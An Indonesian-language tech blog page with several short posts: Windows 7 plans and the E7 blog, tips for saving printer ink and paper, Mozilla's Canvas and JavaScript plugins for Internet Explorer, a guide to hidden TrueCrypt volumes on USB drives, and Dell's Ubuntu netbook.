Saat ini E7 baru memiliki dua artikel. Artikel pertama mendiskusikan syarat pemakaian E7 sedangkan yang satu lagi mengucapkan selamat datang ke para pengunjung (para pecinta Windows), sekaligus memberi keterangan tentang mengapa Microsoft masih belum banyak mendiskusikan Windows 7. Sinofsky mengatakan bahwa mereka "telah belajar tentang komunikasi publik dan bagaimana kami semua terkadang membicarakan fitur-fitur sebelum mengerti penuh tentang fitur-fitur tersebut." Dengan kata lain, mereka berusaha untuk tidak menjanjikan terlalu banyak fitur yang mungkin tidak dapat mereka tepati.

E7 tampaknya tidak akan menjadi blog marketing resmi Windows 7 yang akan dibawahi oleh divisi public relations Microsoft, akan tetapi lebih ditujukan kepada pengunjung teknis.

Read More | Goto Top

Fitur Windows 7 Diumumkan Bulan Depan
Share 0 komentar

Sudah bukan rahasia lagi bahwa Vista tidak sepopuler yang diharapkan Microsoft. Apakah Windows 7 akan menjadi Vista kedua? Apakah user interface (UI) multi-touch Windows 7 akan begitu spektakuler seperti yang diklaim Microsoft?

Tampaknya Microsoft sudah cukup percaya diri untuk memperlihatkan fitur-fitur baru Windows 7 di konferensi bulan depan. Mereka bahkan sudah meluncurkan blog khusus untuk mendiskusikan pengembangan Windows 7 berjudul "Engineering Windows 7" atau E7 seperti yang kami beritakan kemarin.

Microsoft akan mempublikasikan detil dan "informasi teknis mendalam" tentang Windows 7 kepada para hadirin Professional Developers Conference (PDC) pada tanggal 26-29 Oktober dan di konferensi Windows Hardware Engineering Conference (WinHEC) pada tanggal 5-7 November.

Hingga saat ini, Microsoft masih belum banyak bicara tentang fitur-fitur Windows 7, hanya memperlihatkan dukungan untuk multi-touch yang mirip dengan UI iPhone di konferensi All Things Digital.

Multi-touch tak akan dijadikan metode input utama, melainkan dipakai untuk meningkatkan interaksi pemakai dengan berbagai aplikasi. Sebagai contoh, pengguna dapat memainkan piano virtual dengan menekan tuts virtual di layar, dengan mudah memindahkan, melakukan rotasi dan zoom foto dengan dua jari dan melakukan berbagai hal berbasis multi-touch lainnya. Lihatlah video di bawah ini untuk demonstrasi multi-touch Windows 7.

Read More | Goto Top

Cara Pintar & Mudah Mengurangi Biaya Printer
Share 0 komentar

Jika Anda sering mencetak dokumen dengan printer Anda, pasti Anda menyadari bahwa harga tinta dan kertas semakin mahal. Bahkan ada saatnya di mana total biaya mencetak Anda melebihi harga komputer Anda sendiri. Cara terbaik menghemat uang Anda adalah dengan tidak mencetak dokumen. Dengan kemajuan teknologi saat ini, keberadaan printer semakin tidak dibutuhkan, tetapi jika Anda memang harus mencetak suatu dokumen maka dibawah ini ada beberapa cara untuk menghemat dalam mencetak sekaligus membantu bumi kita menjadi lebih hijau.

Cetaklah Lebih Dari Satu Halaman di Selembar Kertas

Ini adalah cara paling sederhana untuk menghemat, terutama untuk presentasi PowerPoint, karena isi presentasinya biasanya masih mudah terbaca walaupun ukurannya diperkecil.

Pada kotak dialog print, pilih Handouts di "Print what" dan pilih jumlah banyaknya slide yang ingin dicetak di setiap lembar kertas. Anda juga bisa menghemat lebih banyak tinta jika mencetak dengan pilihan Grayscale.

Pilih cetak slide


Anda juga akan menemukan pengaturan yang sama pada dialog print di Microsoft Word, di mana Anda bisa menentukan jumlah halaman di setiap lembar kertas. Mencetak 2 halaman pada selembar kertas masih cukup terbaca dengan baik.

Pilih 2 halaman saat mencetak dokumen Word


Banyak printer laser yang juga menyediakan pilihan duplex untuk mencetak pada kedua sisi kertas.

Gunakan Print Preview dan Shrink to Fit

Berapa kali Anda pernah salah mencetak suatu dokumen yang Anda kira cukup di selembar kertas tetapi ternyata tercetak pada dua lembar kertas? Jika Anda selalu mengklik tombol cetak tanpa melihat preview terlebih dahulu, maka Anda akan memboroskan banyak tinta dan kertas. Dengan menggunakan Print Preview maka Anda dapat menghindari kesalahan mencetak yang mungkin terjadi.

Firefox dan IE memiliki opsi yang disebut "Shrink to Fit" yang dapat mengecilkan konten sehingga menghemat kertas Anda, atau Anda bisa memilih tingkat perbesaran sesuka Anda untuk memuatnya ke selembar kertas saja.

Microsoft Word juga memiliki suatu opsi yang disebut "Shrink One Page" yang akan mencoba mengecilkan dokumen Anda sehingga cukup pada selembar kertas dengan mengecilkan font dan spasi dari teksnya.

Cetaklah Bagian yang Anda Butuhkan Saja

Daripada mencetak seluruh dokumen, hampir semua aplikasi memiliki sebuah fitur yang mungkin selama ini tidak Anda perhatikan yaitu fitur untuk mencetak hanya teks yang terblokir. Fitur ini sangat berguna jika Anda hanya ingin mencetak sebuah paragraf dari suatu website atau sebagian kecil teks dari suatu dokumen yang panjang, daripada Anda menghabiskan waktu dengan menghapus halaman-halaman yang tidak Anda butuhkan.

Cara ini dapat bekerja pada sebagian besar aplikasi seperti IE, Firefox, Microsoft Excel & Word. Cukup dengan memblokir bagian dokumen yang ingin Anda cetak dan pilih "Selection" di dialog print.

Pilih cetak selection


Cara ini sangat berguna jika Anda ingin mencetak dari suatu blog karena sangat sedikit blog yang tidak memasukkan bagian komentar dari tampilan cetak sehingga pada akhirnya Anda mencetak berlembar-lembar halaman yang isinya hanya komentar. Perlu Anda ketahui bahwa Anda juga bisa mencetak halaman-halaman tertentu saja, hal ini berguna jika Anda tidak bisa menyeleksi suatu dokumen tetapi mengetahui halaman yang ingin Anda cetak.

Anda juga bisa menggunakan Aardvark extension Firefox, untuk menyembunyikan elemen lain yang tidak ingin Anda cetak yang ada di halaman tersebut seperti iklan dan gambar lainnya.

Mencetak Banyak Seleksi Sekaligus Pada Selembar Kertas

Daripada mencetak sebuah seleksi secara satu persatu, Anda dapat menyeleksi berbagai bagian pada suatu halaman dan mencetaknya pada selembar kertas dengan HP Smart Web untuk IE dan Firefox 2.0. (Walaupun dibuat oleh HP, tetapi aplikasi ini dapat dipakai untuk semua printer). Aplikasi ini dapat menghemat banyak kertas jika Anda seringkali harus mencetak berbagai alamat atau kontak dari berbagai sumber sekaligus.

HP Smart Web
Sayangnya, add-on ini tidak bekerja di Firefox 3 bahkan setelah dicoba dengan Nightly Tester Tools. Semoga mereka akan segera memperbaharui produk ini, karena add-on ini sangat berguna untuk menghemat kertas.

Gunakan Mode Draft Sebagai Setting Default

Jika Anda menggunakan sebuah printer inkjet maka Anda tidak perlu menggunakan kualitas tinggi atau menengah untuk mencetak hal-hal kecil seperti artikel atau apapun itu. Anda akan menghemat banyak tinta (dan waktu) dengan memasang Fast Draft sebagai default pada printer properties, sehingga tidak perlu setiap kali mengganti settingya.

Buka folder Printers, klik kanan printer Anda dan pilih "Printing Preferences". Walaupun setiap jenis printer berbeda, tetapi hampir semuanya memiliki pilihan "Fast Draft" pada bagian kualitas cetakan. Anda juga dapat menghemat tinta warna dengan memilih grayscale sebagai default.

Pilih draft sebagai pengaturan default


Banyak printer yang dapat menyimpan pengaturan Anda sebagai default sehingga Anda dapat dengan cepat memilih pengaturan yang Anda inginkan ketika mencetak dan menghemat banyak waktu.
Cetak ke PDF dan Bukan ke Kertas
Daripada mencetak dokumen pada kertas, Anda dapat "mencetaknya" menjadi file PDF yang lebih mudah diemail dan ramah lingkungan. Ada banyak pilihan untuk mencetak ke PDF termasuk: doPDF, PDFCreator atau CutePDF untuk pengguna Windows, CUPS-PDF untuk Linux dan pengguna Mac OS X telah memiliki fitur "Save as PDF", mereka juga bisa memasang CUPS-PDF sebagai "printer" yang sekaligus menjadi PDF converter.

Mencetak ke PDF dengan CutePDF


Isi Ulang Sendiri Cartridge Printer Anda Kecuali Anda mencetak foto atau sesuatu yang membutuhkan kualitas tinggi (seperti CV misalnya), Anda dapat mengisi ulang cartridge printer Anda yang tentu saja lebih murah daripada membeli cartridge baru. Perlu diingat bahwa cartridge printer tidak dapat selamanya diisi ulang dan kemungkinan gagal cetak akan lebih besar daripada menggunakan cartridge baru, tetapi tentu saja yang menjadi pertimbangan adalah perbedaan harga yang cukup jauh. Jika Anda mau sedikit lebih susah, maka Anda bahkan bisa mengisi ulang sendiri cartridge Anda dan lebih menghemat lagi biaya yang harus dikeluarkan.

Gunakan GreenPrint untuk Menghitung Penghematan Anda



GreenPrint adalah sebuah aplikasi gratis yang bekerja sebagai virtual printer dan melihat dokumen Anda sebelum dikirim ke printer, sehingga Anda bisa membuang apa saja yang tidak ingin Anda cetak sekaligus memberikan pilihan untuk "mencetak" ke PDF atau kertas. Sebagai bonusnya Anda akan melihat sebuah laporan yang isinya berapa banyak kertas dan biaya yang telah Anda hemat.

Read More | Goto Top

Mozilla Tuntun IE Memasuki Web Modern
Share 0 komentar

Walau sudah jauh lebih baik dibandingkan pendahulunya, IE7 tetap saja tidak memiliki banyak fitur penting. Kurangnya dukungan IE terhadap standar web membatasi evolusi web dan memaksa banyak pengembang untuk menggunakan solusi proprietary yang kurang optimal (yaitu Flash untuk menggambar grafik di web).

Akan tetapi kekurangan IE tidak akan lagi menghambat evolusi internet. Mozilla berencana untuk menuntun IE memasuki web generasi baru — tanpa dukungan Microsoft! Salah upayanya adalah sebuah plugin yang mengadaptasikan elemen Canvas di implementasi HTML5 Mozilla agar dapat digunakan di IE.

Canvas

Canvas memungkinkan pengembang web untuk membuat gambar-gambar bitmap dalam konten HTML secara programatis. Teknik ini pertama kali diciptakan Apple untuk memberikan kapabilitas grafik yang lebih kuat kepada engine open source Webkit yang digunakan Safari.

Beberapa saat setelah itu, Canvas akhirnya menjadi standar HTML5 dan telah diimplementasikan baik di Gecko (engine Firefox) maupun Presto (Opera). Walau beberapa aplikasi populer seperti Google Maps menggunakan Canvas sebagai salah satu komponen utama, Canvas tetap tidak dipakai secara luas karena tidak tersedia di IE. Google sendiri harus menggunakan ExCanvas — sebuah library untuk menjembatani fitur-fitur Canvas ke VML (alternatif proprietary Microsoft untuk SVG).

Sayangnya, implementasi VML terlalu lambat untuk dapat dipakai di aplikasi web interaktif. IE7 tidak mendukung Canvas, Microsoft sendiri telah mengatakan bahwa IE8 juga tidak akan mendukung Canvas. Solusi Mozilla adalah dengan membuat plugin ActiveX yang dapat meng-implementasi Canvas di IE.

Vladimir Vukicevic dari Mozilla telah membuat sebuah prototipe yang mendemonstrasikan konsepnya. Plugin untuk IE ini terbuat dari source code Mozilla dan mengimplementasikan sebagian besar spesifikasi Canvas HTML5 yang walaupun belum sempurna, membuktikan bahwa hal ini dapat dilakukan.

Plugin Canvas di IE

Screaming Monkey

Plugin Canvas ini hanyalah langkah pertama untuk membawa teknologi web standar ke IE. Mozilla juga tengah mengerjakan sebuah inisiatif ambisius bernama Screaming Monkey untuk menanamkan seluruh engine JavaScript generasi baru Mozilla ke dalam IE. Apabila plugin-plugin buatan Mozilla ini banyak dipakai para pengunjung web, para pengembang akan dapat mengimplementasikan teknologi-teknologi standar web tanpa terbatas oleh limitasi IE.

Bantuan Adobe

Membawa dua teknologi ini ke pemakai tidak mudah, akan tetapi ada beberapa solusi yang menarik. Adobe saat ini sudah bekerja sama dengan Mozilla mengembangkan teknologi scripting generasi baru. Apabila Adobe memutuskan untuk mengemas Screaming Monkey dan Canvas ke dalam iterasi baru plugin Flash, adopsi kedua teknologi ini akan sangat terbantu, mengingat Flash terpasang di sekitar 98,8% komputer, setidaknya menurut Adobe.

Read More | Goto Top

Enkripsi USB Anda dengan TrueCrypt
Share 0 komentar

Truecrypt+USBTrueCrypt memungkinkan Anda membuat berbagai macam partisi (volume) terenkripsi. Bahkan lebih baik lagi, ia dapat membuat volume tersembunyi. Triknya adalah dengan mengubah semua tempat kosong pada USB menjadi volume TrueCrypt dengan penampilan yang bagus namun menipu. Volume ini adalah volume terenkripsi yang terlindung dengan kata kunci rahasia.

Pada kondisi normal, tempat kosong pada Truecrypt selalu diisi dengan data acak, namun saat Anda membuat volume tersembunyi pada tempat yang sama, ia tidak lagi memuat data acak melainkan volume terenkripsi dengan kata kunci, di dalamnya Anda dapat menyimpan berbagai macam data yang sangat rahasia.

Sekali Anda mengunduh TrueCrypt dan menghubungkan USB Anda dengan komputer, Anda dapat langsung menciptakan volume palsu:

Truecrypt
  1. Jalankan Volume Creation Wizard, pilih Create a volume within a non-system partition/device dan klik Next.
  2. Pilih lokasi dari USB Anda, pastikan bahwa USB ini berada dalam keadaan unmounted (apabila berada di Linux).
  3. Pilih sebuah enkripsi dan algoritma, AES dan RIPEMD 60 adalah kombinasi yang baik.
  4. Pilih kata kunci untuk membuka volume palsu di depan.
  5. Gerakan mouse untuk membuat data acak selama proses enkripsi, lalu tekan tombol format saat Anda selesai.
  6. TrueCrypt memungkinkan Anda untuk menyusun volume luar. Anda harus menyalin dokumen-dokumen umpan yang Anda ciptakan ke dalam volume luar ini terlebih dahulu. Setelah selesai, jangan mengubah volume luar ini lagi karena berkemungkinan mengganggu data yang ditulis di volume tersembunyi Truecrypt.
  7. Setelah menganalisa file yang Anda tambahkan, TrueCrypt akan memberitahu berapa ruang yang masih tersedia untuk menyembunyikan volume buatan Anda. Lalu ulangi proses pembuatan lagi untuk menciptakannya.

TrueCrypt tersedia untuk Windows dan Mac OS X juga Linux.

Read More | Goto Top

Serangan Balik Dell Terhadap Asus Eee
Share 0 komentar

Akhirnya, subnotebook Dell yang sudah begitu lama ditunggu hadir ke hadapan konsumen akhir minggu ini, dan datang dengan Ubuntu 8.04. Laptop kecil dengan nama Inspiron 910 bisa saja akan menggantikan seri Asus Eee sebagai netbook berbasis Linux yang dominan.
Selain Ubuntu, produk ini akan dilengkapi dengan prosesor Intel Atom 1.6GHz, RAM mencapai 1GB dan layar berukuran 8.9 inci dengan resolusi 1024x600. Masih ada lagi kamera, Solid-State Drives (SSD) dengan kapasitas antara 4GB sampai 16GB, VGA port, media card reader, WiFi, dan 3 USB port. Harganya diperkirakan sekitar US$299 untuk model standar.

Perusahaan di balik distro Ubuntu Linux, Canonical juga banyak berharap pada pasar subnotebook. Salah satu juru bicara grup OEM Canonical, Pete Goodall mengindikasikan adanya beberapa produk menarik yang akan diluncurkan dalam waktu dekat ini. Ia juga menambahkan kalau Inspiron 910 milik Dell merupakan titik awal yang baik untuk debut subnotebook Ubuntu.

Walaupun belum ada konfirmasi resmi, tampaknya Dell akan menggunakan Ubuntu Netbook Remix, yaitu Ubuntu yang memang didesain secara spesifik untuk alat-alat mobile berbasis Atom. Dari sedikit contekan tentang Netbook Remix bulan Juni lalu, selain mengoptimalkan kinerja hardware untuk mengurangi konsumsi daya, Netbook Remix juga datang dengan user interface yang bisa dikustomisasi untuk memberikan tampilan yang efisien untuk layar berukuran kecil.

Screenshot Ubuntu Netbook Remix


Jika Inspiron 910 benar-benar diluncurkan pada tanggal 22 Agustus, timingnya benar-benar tepat. Distro Linux berbasis Xandros yang dipakai Asus sudah mulai dirasa ketinggalan jaman, bahkan beberapa antusias suda berusaha menggantinya dengan menginstalasikan varian Ubuntu yang lebih ringan. Jadi, bagi para konsumen yang ingin segera menggunakan Ubuntu langsung di netbook yang masih segar, Inspiron 910 akan menjadi pilihan yang sangat baik.

Read More | Goto Top

Berlangganan

Berlangganan RSS Feed via Email:


Ada kesalahan di dalam gadget ini

Artikel Populer

Blog Archive

Pengikut

Recomended Download


Add to Your Blog